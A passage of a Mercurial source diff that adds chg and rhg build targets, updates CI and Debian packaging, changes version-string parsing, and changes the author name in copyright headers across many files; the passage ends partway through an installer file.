--- a/Makefile Thu Mar 25 19:06:28 2021 -0400
+++ b/Makefile Tue Apr 20 11:01:06 2021 -0400
@@ -68,6 +68,12 @@
build:
$(PYTHON) setup.py $(PURE) build $(COMPILERFLAG)
+build-chg:
+ make -C contrib/chg
+
+build-rhg:
+ (cd rust/rhg; cargo build --release)
+
wheel:
FORCE_SETUPTOOLS=1 $(PYTHON) setup.py $(PURE) bdist_wheel $(COMPILERFLAG)
@@ -96,6 +102,9 @@
install-bin: build
$(PYTHON) setup.py $(PURE) install --root="$(DESTDIR)/" --prefix="$(PREFIX)" --force
+install-chg: build-chg
+ make -C contrib/chg install PREFIX="$(PREFIX)"
+
install-doc: doc
cd doc && $(MAKE) $(MFLAGS) install
@@ -107,6 +116,9 @@
install-home-doc: doc
cd doc && $(MAKE) $(MFLAGS) PREFIX="$(HOME)" install
+install-rhg: build-rhg
+ install -m 755 rust/target/release/rhg "$(PREFIX)"/bin/
+
MANIFEST-doc:
$(MAKE) -C doc MANIFEST
@@ -175,7 +187,7 @@
$(PYFILESCMD) | xargs \
xgettext --package-name "Mercurial" \
--msgid-bugs-address "<mercurial-devel@mercurial-scm.org>" \
- --copyright-holder "Matt Mackall <mpm@selenic.com> and others" \
+ --copyright-holder "Olivia Mackall <olivia@selenic.com> and others" \
--from-code ISO-8859-1 --join --sort-by-file --add-comments=i18n: \
-d hg -p i18n -o hg.pot.tmp
$(PYTHON) i18n/posplit i18n/hg.pot.tmp
--- a/README.rst Thu Mar 25 19:06:28 2021 -0400
+++ b/README.rst Tue Apr 20 11:01:06 2021 -0400
@@ -18,3 +18,13 @@
See https://mercurial-scm.org/ for detailed installation
instructions, platform-specific notes, and Mercurial user information.
+
+Notes for packagers
+===================
+
+Mercurial ships a copy of the python-zstandard sources. This is used to
+provide support for zstd compression and decompression functionality. The
+module is not intended to be replaced by the plain python-zstandard nor
+is it intended to use a system zstd library. Patches can result in hard
+to diagnose errors and are explicitly discouraged as unsupported
+configuration.
--- a/black.toml Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,14 +0,0 @@
-[tool.black]
-line-length = 80
-exclude = '''
-build/
-| wheelhouse/
-| dist/
-| packages/
-| \.hg/
-| \.mypy_cache/
-| \.venv/
-| mercurial/thirdparty/
-'''
-skip-string-normalization = true
-quiet = true
--- a/contrib/all-revsets.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/all-revsets.txt Tue Apr 20 11:01:06 2021 -0400
@@ -46,8 +46,8 @@
# Used in revision c1546d7400ef
min(0::)
# Used in revision 546fa6576815
-author(lmoscovicz) or author(mpm)
-author(mpm) or author(lmoscovicz)
+author(lmoscovicz) or author(olivia)
+author(olivia) or author(lmoscovicz)
# Used in revision 9bfe68357c01
public() and id("d82e2223f132")
# Used in revision ba89f7b542c9
@@ -100,7 +100,7 @@
draft() and ::tip
::tip and draft()
author(lmoscovicz)
-author(mpm)
+author(olivia)
::p1(p1(tip))::
public()
:10000 and public()
@@ -130,7 +130,7 @@
head()
head() - public()
draft() and head()
-head() and author("mpm")
+head() and author("olivia")
# testing the mutable phases set
draft()
--- a/contrib/base-revsets.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/base-revsets.txt Tue Apr 20 11:01:06 2021 -0400
@@ -25,9 +25,9 @@
0::tip
roots(0::tip)
author(lmoscovicz)
-author(mpm)
-author(lmoscovicz) or author(mpm)
-author(mpm) or author(lmoscovicz)
+author(olivia)
+author(lmoscovicz) or author(olivia)
+author(olivia) or author(lmoscovicz)
tip:0
0::
# those two `roots(...)` inputs are close to what phase movement use.
--- a/contrib/check-code.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/check-code.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# check-code - a style and portability checker for Mercurial
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/contrib/check-commit Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/check-commit Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
#!/usr/bin/env python3
#
-# Copyright 2014 Matt Mackall <mpm@selenic.com>
+# Copyright 2014 Olivia Mackall <olivia@selenic.com>
#
# A tool/hook to run basic sanity checks on commits/patches for
# submission to Mercurial. Install by adding the following to your
--- a/contrib/check-config.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/check-config.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# check-config - a config flag documentation checker for Mercurial
#
-# Copyright 2015 Matt Mackall <mpm@selenic.com>
+# Copyright 2015 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/contrib/chg/chg.1 Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/chg/chg.1 Tue Apr 20 11:01:06 2021 -0400
@@ -36,6 +36,6 @@
.B \-\-kill\-chg\-daemon
Terminate the background command servers.
.SH SEE ALSO
-.BR hg (1),
+.BR hg (1)
.SH AUTHOR
Written by Yuya Nishihara <yuya@tcha.org>.
--- a/contrib/clang-format-ignorelist Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/clang-format-ignorelist Tue Apr 20 11:01:06 2021 -0400
@@ -9,3 +9,4 @@
hgext/fsmonitor/pywatchman/**.c
mercurial/thirdparty/**.c
mercurial/thirdparty/**.h
+mercurial/pythoncapi_compat.h
--- a/contrib/examples/fix.hgrc Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/examples/fix.hgrc Tue Apr 20 11:01:06 2021 -0400
@@ -5,7 +5,7 @@
rustfmt:command = rustfmt +nightly
rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**"
-black:command = black --config=black.toml -
+black:command = black --config=pyproject.toml -
black:pattern = set:**.py - mercurial/thirdparty/**
# Mercurial doesn't have any Go code, but if we did this is how we
--- a/contrib/fuzz/Makefile Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/fuzz/Makefile Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
-CC = clang
-CXX = clang++
+CC ?= clang
+CXX ?= clang++
# By default, use our own standalone_fuzz_target_runner.
# This runner does no fuzzing, but simply executes the inputs
@@ -10,6 +10,15 @@
# OSS-Fuzz will define its own value for LIB_FUZZING_ENGINE.
LIB_FUZZING_ENGINE ?= standalone_fuzz_target_runner.o
+# Default to Python 3.
+#
+# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is.
+ifeq ($(OS),Windows_NT)
+PYTHON?=py -3
+else
+PYTHON?=python3
+endif
+
PYTHON_CONFIG ?= $$OUT/sanpy/bin/python-config
PYTHON_CONFIG_FLAGS ?= --ldflags --embed
@@ -20,7 +29,7 @@
standalone_fuzz_target_runner.o: standalone_fuzz_target_runner.cc
$$OUT/%_fuzzer_seed_corpus.zip: %_corpus.py
- python $< $@
+ $(PYTHON) $< $@
pyutil.o: pyutil.cc pyutil.h
$(CXX) $(CXXFLAGS) -g -O1 \
--- a/contrib/heptapod-ci.yml Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/heptapod-ci.yml Tue Apr 20 11:01:06 2021 -0400
@@ -7,6 +7,8 @@
variables:
PYTHON: python
TEST_HGMODULEPOLICY: "allow"
+ HG_CI_IMAGE_TAG: "latest"
+ TEST_HGTESTS_ALLOW_NETIO: "0"
.runtests_template: &runtests
stage: tests
@@ -17,21 +19,12 @@
- hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'`
- cd /tmp/mercurial-ci/
- ls -1 tests/test-check-*.* > /tmp/check-tests.txt
+ - black --version
+ - clang-format --version
script:
- echo "python used, $PYTHON"
- echo "$RUNTEST_ARGS"
- - HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS
-
-
-.rust_template: &rust
- before_script:
- - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no
- - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'`
- - ls -1 tests/test-check-*.* > /tmp/check-tests.txt
- - cd /tmp/mercurial-ci/rust/rhg
- - cargo build
- - cd /tmp/mercurial-ci/
-
+ - HGTESTS_ALLOW_NETIO="$TEST_HGTESTS_ALLOW_NETIO" HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS
checks-py2:
<<: *runtests
@@ -58,14 +51,23 @@
phabricator-refresh:
stage: phabricator
+ variables:
+ DEFAULT_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)"
+ STABLE_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\n⚠ This patch is intended for stable ⚠\n{image https://media.giphy.com/media/nYI8SmmChYXK0/source.gif}"
script:
- - "./contrib/phab-refresh-stack.sh --comment \":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\""
+ - |
+ if [ `hg branch` == "stable" ]; then
+ ./contrib/phab-refresh-stack.sh --comment "$STABLE_COMMENT";
+ else
+ ./contrib/phab-refresh-stack.sh --comment "$DEFAULT_COMMENT";
+ fi
test-py2:
<<: *runtests
variables:
RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt"
TEST_HGMODULEPOLICY: "c"
+ TEST_HGTESTS_ALLOW_NETIO: "1"
test-py3:
<<: *runtests
@@ -73,6 +75,7 @@
RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt"
PYTHON: python3
TEST_HGMODULEPOLICY: "c"
+ TEST_HGTESTS_ALLOW_NETIO: "1"
test-py2-pure:
<<: *runtests
@@ -89,7 +92,6 @@
test-py2-rust:
<<: *runtests
- <<: *rust
variables:
HGWITHRUSTEXT: cpython
RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt"
@@ -97,13 +99,20 @@
test-py3-rust:
<<: *runtests
- <<: *rust
variables:
HGWITHRUSTEXT: cpython
RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt"
PYTHON: python3
TEST_HGMODULEPOLICY: "rust+c"
+test-py3-rhg:
+ <<: *runtests
+ variables:
+ HGWITHRUSTEXT: cpython
+ RUNTEST_ARGS: "--rust --rhg --blacklist /tmp/check-tests.txt"
+ PYTHON: python3
+ TEST_HGMODULEPOLICY: "rust+c"
+
test-py2-chg:
<<: *runtests
variables:
--- a/contrib/hg-test-mode.el Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/hg-test-mode.el Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
;; hg-test-mode.el - Major mode for editing Mercurial tests
;;
-;; Copyright 2014 Matt Mackall <mpm@selenic.com>
+;; Copyright 2014 Olivia Mackall <olivia@selenic.com>
;; "I have no idea what I'm doing"
;;
;; This software may be used and distributed according to the terms of the
--- a/contrib/hgperf Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/hgperf Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# hgperf - measure performance of Mercurial commands
#
-# Copyright 2014 Matt Mackall <mpm@selenic.com>
+# Copyright 2014 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/contrib/logo-droplets.svg Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/logo-droplets.svg Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
-<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Matt Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata>
+<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Olivia Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata>
<rect id="rect6847" stroke-linejoin="miter" style="stroke-dasharray:none;" height="150.12" width="124.77" stroke="#000" stroke-miterlimit="4" y="0.98776" x="0.3169" stroke-width="1.9755" fill="#FFF"/><path id="text2611" style="stroke-dasharray:none;" d="M9.848,124.61c1.777-0.79,3.665-1.18,5.479-1.18,1.74,0,2.851,0.43,3.48,1.32,1.332-0.89,3.146-1.32,4.553-1.32,4.221,0,4.369,1.71,4.369,6.73v11.11c0,0.49,0.074,0.49-2.036,0.49v-11.81c0-3.63-0.074-4.74-2.48-4.74-1.073,0-2.184,0.25-3.369,1.03v15.27c-0.037,0.15-0.111,0.18-0.369,0.22-0.038,0-0.074,0.03-0.112,0.03h-1.555v-11.81c0-3.49,0-4.77-2.517-4.77-1.074,0-2.147,0.21-3.406,0.82v15.27c0,0.49,0.074,0.49-2.0361,0.49v-17.15m27.831-1.18c-3.146,0-6.626,0.89-6.626,10.4,0,7.33,2.554,8.47,6.071,8.47,2.701,0,5.034-0.89,5.034-1.32,0-0.53-0.074-1.35-0.259-1.82-1.148,0.79-2.777,1.21-4.59,1.21-2.48,0-4.146-0.71-4.184-6.22,1.629,0,5.776-0.04,8.848-0.65,0.259-1.17,0.37-2.88,0.37-4.37,0-3.56-1.444-5.7-4.664-5.7m-0.185,1.78c2.221,0,2.813,1.46,2.85,4.31,0,0.75-0.037,1.64-0.148,2.49-2.073,0.5-5.591,0.5-7.072,0.5,0.261-6.48,2.481-7.3,4.37-7.3m8.07-0.21c1.739-1.14,3.332-1.57,4.961-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.112,0.96-0.297,1.31-0.519-0.28-1.11-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m18.69-0.39c0-0.47-1.554-1.18-3.11-1.18-2.999,0-6.664,1.03-6.664,9.83,0,8.33,2.222,9.07,6.109,9.07,1.924,0,3.665-1.03,3.665-1.6,0-0.32-0.074-0.82-0.26-1.24-0.778,0.56-1.962,1.1-3.22,1.1-2.665,0-4.22-0.75-4.22-7.23,0-7.15,2.554-8.15,4.775-8.15,1.258,0,1.962,0.36,2.665,0.82,0.186-0.43,0.26-1.03,0.26-1.42m14.181,16.55c-1.63,0.82-3.776,1.14-5.627,1.14-4.739,0-5.442-1.99-5.442-6.73v-11.14c0-0.46-0.037-0.46,2.074-0.46v11.82c0,3.56,0.517,4.77,3.294,4.77,1.073,0,2.554-0.22,3.665-0.86v-15.27c0-0.46-0.074-0.46,2.036-0.46v17.19m4.221-16.16c1.739-1.14,3.332-1.57,4.96-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.111,0.96-0.296,1.31-0.519-0.28-1.111-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m12.379-1.03c-1.629,0-2.11,0-2.11,0.96v16.83c2.073,0,2.11,0,2.11-0.49v-17.3m-2.184-6.27c0,1.18,0.37,1.6,1.11,1.64,0.851,0,1.259-0.61,1.259-1.67,0.037-1.11-0.26-1.61-1.111-1.61-0.814,0-1.221,0.61-1.258,1.64m5.696,7.3c0-0.39,0.074-0.61,0.222-0.71,0.704-0.39,3.41-0.86,6.48-0.86,2.33,0,3.81,1.11,3.81,4.31v2.31c0,6.34-0.18,11.07-0.18,11.07-0.85,0.47-2.45,1.18-5.04,1.18-2.66,0.03-5.329-0.22-5.329-5.48,0-5.02,2.739-5.81,5.479-5.81,1.04,0,2.26,0.11,3.07,0.43v-3.31c0-2.31-1.18-2.81-2.59-2.81-1.89,0-4.514,0.35-5.662,0.89-0.222-0.39-0.26-1-0.26-1.21m8.512,7.9c-0.7-0.25-1.7-0.35-2.4-0.35-2.11,0-4.04,0.42-4.04,4.34,0,3.66,1.59,3.7,3.48,3.7,1.19,0,2.37-0.32,2.78-0.75,0,0,0.18-4.27,0.18-6.94m7.86,8.37c0,0.49,0.04,0.49-2.04,0.49v-25.2c0-0.96,0.41-0.96,2.04-0.96v25.67" stroke-miterlimit="4" stroke-width="2.02999997" fill="#010101"/><g id="g4503" transform="matrix(0.9351326,0,0,0.9351326,150.39508,-1.251766)"><path id="path2339" fill="#1b1a1b" d="M-45.75,92.692c20.04-33.321-4.232-87.363-48.614-81.873-40.096,4.958-40.746,47.165-5.405,57.191,30.583,8.685,6.318,28.084,7.027,41,0.712,12.92,26.587,17.6,46.992-16.318z"/><circle id="circle2341" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="85.364" cx="33.728" r="15.414" fill="#1b1a1b"/><path id="path2343" fill="#1b1a1b" d="M-140.06,48.936c-6.26,0.606-10.84,6.164-10.24,12.422,0.61,6.262,6.17,10.847,12.43,10.241,6.26-0.614,10.84-6.171,10.23-12.43-0.61-6.253-6.16-10.839-12.42-10.233z"/><path id="path2561" fill="#bfbfbf" d="M-44.993,91.34c20.041-33.321-4.231-87.363-48.613-81.873-40.104,4.9568-40.744,47.166-5.406,57.193,30.583,8.684,6.318,28.083,7.027,41,0.713,12.92,26.587,17.6,46.992-16.32z"/><path id="path2563" fill="#000" d="M-86.842,112.76c-1.215-1.97,0.642-4.16,2.551-3.99,3.039,0.26,9.655-0.04,14.876-3,13.043-7.39,33.114-42.966,23.019-65.405-4.519-10.044-6.72-12.92-11.374-17.833-0.95-1.002-0.405-0.948,0.238-0.609,2.517,1.321,6.94,6.437,11.477,14.765,7.664,14.069,7.267,30.795,4.416,41.287-1.986,7.299-8.825,23.815-18.842,30.955-10.039,7.15-21.785,11.26-26.361,3.83z"/><path id="path2565" fill="#000" d="M-95.93,66.591c-6.83-2.028-15.64-4.853-20.74-11.517-3.75-4.914-5.66-10.277-6.15-13.318-0.17-1.085-0.32-1.991-0.01-2.24,0.15-0.117,2.81,5.896,6.79,10.936,3.97,5.04,9.53,7.988,14.16,9.059,4.117,0.952,12.646,3.044,15.532,5.503,2.967,2.527,3.215,7.987,2.216,8.603-1.006,0.62-3.048-4.429-11.798-7.026z"/><path id="path2567" fill="#FFF" d="M-81.841,113.72c-0.132,1.57,1.665,1.87,4.083,1.51,3.099-0.46,5.72-0.81,9.287-2.6,4.835-2.42,9.728-5.89,13.312-10.57,10.692-13.945,14.478-30.45,13.895-32.824-0.195,1.961-2.776,12.253-8.679,21.532-7.582,11.922-13.079,18.262-25.758,21.342-3.529,0.86-5.967-0.45-6.14,1.61z"/><path id="path2569" fill="#FFF" d="M-109.96,59.479c1.44,1.225,4.4,2.857,10.223,4.767,7.031,2.305,10.455,4.304,11.888,5.262,1.52,1.018,2.483,3.288,2.578,1.272,0.099-2.019-1.145-3.755-3.921-4.675-1.878-0.624-5.038-2.109-8.067-2.707-1.946-0.384-5.111-1.146-7.831-1.978-1.48-0.457-3-1.258-4.87-1.941z"/><circle id="circle2577" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="84.375" cx="34.681" r="15.414" fill="#bfbfbf"/><path id="path2579" fill="#000" d="M-128.68,108.38c13.53,12.54,33.894-4.69,24.93-19.897-1.01-1.708-2.32-3.009-1.89-1.7,2.87,8.747,0.22,15.667-4.72,19.227-4.85,3.5-11.51,4.09-16.84,1.32-1.57-0.81-2.22,0.37-1.48,1.05z"/><path id="path2585" fill="#FFF" d="M-118.07,110.95c1.73-0.36,11.75-2.95,14.1-11.194,0.73-2.569,0.86-2.053,0.66-0.661-1.06,7.105-7.78,12.345-13.49,12.545-1.16,0.12-2.68-0.39-1.27-0.69z"/><path id="path2589" fill="#bfbfbf" d="M-139.3,47.584c-6.26,0.605-10.84,6.164-10.24,12.422,0.61,6.261,6.17,10.847,12.43,10.241,6.25-0.614,10.84-6.173,10.23-12.431-0.61-6.254-6.17-10.838-12.42-10.232z"/><path id="path2591" fill="#000" d="M-144.47,67.571c0.07,0.805,1.17,1.838,2.9,2.312,1.49,0.408,5.32,1.45,10.25-1.658,4.92-3.108,5.49-11.421,3.25-13.865-0.69-1.239-1.59-2.14-0.88-0.164,1.81,4.99-1.7,9.659-4.74,11.82-3.03,2.162-6.88,1.139-8.45,0.66s-2.4,0.064-2.33,0.895z"/><path id="path2597" fill="#FFF" d="M-138.11,68.688c0.45-0.406,2.73-0.24,4.79-1.35,2.07-1.109,4.52-3.54,4.95-6.994,0.26-2.029,0.34-1.519,0.44-0.415-0.32,5.743-5.6,8.916-8.62,9.334-0.82,0.113-2.25,0.044-1.56-0.575z"/><path id="path2561_1_" fill="#999" d="M-47.767,69.694c8.532-24.594-9.323-61.736-45.446-57.268-32.637,4.035-33.167,38.389-4.4,46.55,32.582,4.933,12.962,29.512,10.179,41.904-2.495,11.11,26.331,12.94,39.667-31.186z"/><path id="path2571" fill="#f3f3f3" d="M-70.093,88.904c-8.827-1.092-21.529,18.836-9.552,16.506,5.756-0.86,10.525-2.89,14.794-7.762,5.567-6.353,13.883-20.074,16.288-28.94,2.025-7.476,1.007-19.057-1.081-8.175-2.142,11.167-11.623,29.464-20.449,28.371z"/><path id="path2581" fill="#999" d="M-129.39,104.85c2.05,0.03,3.28,0.32,5.35,1.77,4.09,1.7,11.61,0.62,15.09-3.95,3.47-4.57,3.58-10.868,2.26-14.674-3.24-9.314-16.99-9.149-23.13-1.417-6.64,8.636-1.61,18.231,0.43,18.271z"/><path id="path2593_2_" fill="#999" d="M-147.64,61.684c0.41,1.282,1.45,3.154,3.65,3.466,2.94,0.417,3.54,1.743,7,1.055,3.47-0.688,6.09-3.528,7.14-6.67,1.21-4.347-0.59-6.591-3.31-8.595-2.71-2.003-8.67-1.788-12.23,1.458-2.53,2.305-3.24,6.163-2.25,9.286z"/><path id="path256" fill="#f3f3f3" d="M-136.11,64.558c2.66-0.697,6.18-4.325,4.44-7.096-2.16-3.413-8.17-0.491-8.37,3.309-0.21,3.802,1.11,4.526,3.93,3.787z"/><path id="path258" fill="#f3f3f3" d="M-116.12,105.51c2.28-0.6,9.24-3.43,7.93-13.547-0.66-5.126-3.46,6.361-8.63,8.077-7.85,2.61-6.97,7.48,0.7,5.47z"/></g>
</svg>
--- a/contrib/memory.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/memory.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# memory.py - track memory usage
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/contrib/packaging/debian/control Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/debian/control Tue Apr 20 11:01:06 2021 -0400
@@ -25,7 +25,9 @@
Suggests: wish
Replaces: mercurial-common
Breaks: mercurial-common
+Provides: python3-mercurial
Architecture: any
+Homepage: https://www.mercurial-scm.org/
Description: fast, easy to use, distributed revision control tool.
Mercurial is a fast, lightweight Source Control Management system designed
for efficient handling of very large distributed projects.
--- a/contrib/packaging/debian/copyright Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/debian/copyright Tue Apr 20 11:01:06 2021 -0400
@@ -3,7 +3,7 @@
Source: https://www.mercurial-scm.org/
Files: *
-Copyright: 2005-2021, Matt Mackall <mpm@selenic.com> and others.
+Copyright: 2005-2021, Olivia Mackall <olivia@selenic.com> and others.
License: GPL-2+
This program is free software; you can redistribute it
and/or modify it under the terms of the GNU General Public
--- a/contrib/packaging/debian/rules Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/debian/rules Tue Apr 20 11:01:06 2021 -0400
@@ -18,6 +18,10 @@
# DEB_HG_PYTHON_VERSIONS="3.7 3.8" make deb
DEB_HG_MULTI_VERSION?=0
+# Set to 1 to make /usr/bin/hg a symlink to chg, and move hg to
+# /usr/lib/mercurial/hg.
+DEB_HG_CHG_BY_DEFAULT?=0
+
CPUS=$(shell cat /proc/cpuinfo | grep -E ^processor | wc -l)
# By default, only build for the version of python3 that the system considers
@@ -40,6 +44,12 @@
DEB_HG_PYTHON_VERSIONS?=$(shell py3versions -vd)
endif
+ifeq ($(DEB_HG_CHG_BY_DEFAULT), 1)
+ # Important: the "real" hg must have a 'basename' of 'hg'. Otherwise, hg
+ # behaves differently when setting $HG and breaks aliases that use that.
+ export HGPATH=/usr/lib/mercurial/hg
+endif
+
export HGPYTHON3=1
export PYTHON=python3
@@ -86,3 +96,8 @@
cp contrib/bash_completion "$(CURDIR)"/debian/mercurial/usr/share/bash-completion/completions/hg
mkdir -p "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions
cp contrib/zsh_completion "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions/_hg
+ if [ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]; then \
+ mkdir -p "$(CURDIR)"/debian/mercurial/usr/lib/mercurial; \
+ mv "$(CURDIR)"/debian/mercurial/usr/bin/hg "$(CURDIR)"/debian/mercurial/usr/lib/mercurial/hg; \
+ ln -s chg "$(CURDIR)"/debian/mercurial/usr/bin/hg; \
+ fi
--- a/contrib/packaging/hgpackaging/util.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/hgpackaging/util.py Tue Apr 20 11:01:06 2021 -0400
@@ -161,10 +161,10 @@
>>> normalize_windows_version("5.3rc1")
'5.3.0.1'
- >>> normalize_windows_version("5.3rc1+2-abcdef")
+ >>> normalize_windows_version("5.3rc1+hg2.abcdef")
'5.3.0.1'
- >>> normalize_windows_version("5.3+2-abcdef")
+ >>> normalize_windows_version("5.3+hg2.abcdef")
'5.3.0.2'
"""
if '+' in version:
@@ -188,8 +188,8 @@
if rc is not None:
versions.append(rc)
elif extra:
- # <commit count>-<hash>+<date>
- versions.append(int(extra.split('-')[0]))
+ # hg<commit count>.<hash>+<date>
+ versions.append(int(extra.split('.')[0][2:]))
return '.'.join('%d' % x for x in versions[0:4])
--- a/contrib/packaging/inno/mercurial.iss Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/inno/mercurial.iss Tue Apr 20 11:01:06 2021 -0400
@@ -6,7 +6,7 @@
#endif
[Setup]
-AppCopyright=Copyright 2005-2021 Matt Mackall and others
+AppCopyright=Copyright 2005-2021 Olivia Mackall and others
AppName=Mercurial
AppVersion={#VERSION}
OutputBaseFilename=Mercurial-{#VERSION}{#SUFFIX}
@@ -20,7 +20,7 @@
InfoAfterFile=../postinstall.txt
LicenseFile=Copying.txt
ShowLanguageDialog=yes
-AppPublisher=Matt Mackall and others
+AppPublisher=Olivia Mackall and others
AppPublisherURL=https://mercurial-scm.org/
AppSupportURL=https://mercurial-scm.org/
AppUpdatesURL=https://mercurial-scm.org/
@@ -29,8 +29,8 @@
DefaultDirName={pf}\Mercurial
SourceDir=stage
VersionInfoDescription=Mercurial distributed SCM (version {#VERSION})
-VersionInfoCopyright=Copyright 2005-2021 Matt Mackall and others
-VersionInfoCompany=Matt Mackall and others
+VersionInfoCopyright=Copyright 2005-2021 Olivia Mackall and others
+VersionInfoCompany=Olivia Mackall and others
VersionInfoVersion={#QUAD_VERSION}
InternalCompressLevel=max
SolidCompression=true
--- a/contrib/packaging/wix/mercurial.wxs Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/wix/mercurial.wxs Tue Apr 20 11:01:06 2021 -0400
@@ -19,14 +19,14 @@
Name='Mercurial $(var.Version) ($(var.Platform))'
UpgradeCode='$(var.ProductUpgradeCode)'
Language='1033' Codepage='1252' Version='$(var.Version)'
- Manufacturer='Matt Mackall and others'>
